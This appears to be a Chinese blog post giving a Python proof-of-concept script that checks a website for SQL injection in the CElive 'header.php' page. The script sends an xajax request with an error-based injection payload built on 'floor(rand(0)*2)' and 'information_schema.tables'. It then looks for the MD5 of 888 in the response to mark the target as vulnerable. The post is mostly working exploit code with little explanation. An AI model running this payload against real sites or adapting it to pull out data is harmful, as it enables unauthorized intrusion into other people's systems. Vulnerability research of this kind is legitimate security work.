Python3实现PoC——wooyun
发布时间:2019-09-26 07:27:17编辑:auto阅读(1997)
一、演示一下的利用效果
二、漏洞说明
这次的PoC是验证SQL注入,漏洞详情
三、代码+注释
import requests
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest="url")
args = parser.parse_args()
url = args.url
# 存在漏洞的页面
url += "/celive/live/header.php"
# 构造payload,用md5结果来验证
payload = {
'xajax': 'LiveMessage',
'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),"
"concat(floor(rand(0)*2),(select md5(888)))a"
" from information_schema.tables group by a)b)"
",'','','','1','127.0.0.1','2') #"
}
try:
r = requests.post(url, data=payload)
if(r.status_code == requests.codes.ok):
if "0a113ef6b61820daa5611c870ed8d5ee" in r.text:
print("{} is SQL_vul".format(url))
else:
print("{} is not SQL_vul".format(url))
except Exception as e:
print(str(e))
上一篇: python3 三级菜单-基础版
下一篇: Python3 生成一个随机验证码
- openvpn linux客户端使用
47754
- H3C基本命令大全
46259
- openvpn windows客户端使用
37140
- H3C IRF原理及 配置
34647
- Python exit()函数
29238
- openvpn mac客户端使用
25896
- python全系列官方中文文档
24766
- 1.常用turtle功能函数
19870
- python 获取网卡实时流量
19433
- python 获取Linux和Windows硬件信息
17924
- python3-scipy-ndimage平滑
5724°
- python3-scikit-image平滑去噪
6329°
- python3-PIL非线性噪声平滑
5845°
- python3-Scipy-ndimage进行盒核与高斯核平滑比较
5897°
- python3-PIL高斯模糊滤波器平滑
6998°
- python3-PIL基于盒模糊核均值化平滑
5835°
- python3-PIL线性噪声平滑
5854°
- python3-scikit-image直方图匹配
6368°
- python3-scikit-image对比拉伸和直方图均衡化
6323°
- python3-PIL二值化
7688°
- 姓名:Run
- 职业:谜
- 邮箱:383697894@qq.com
- 定位:上海 · 松江
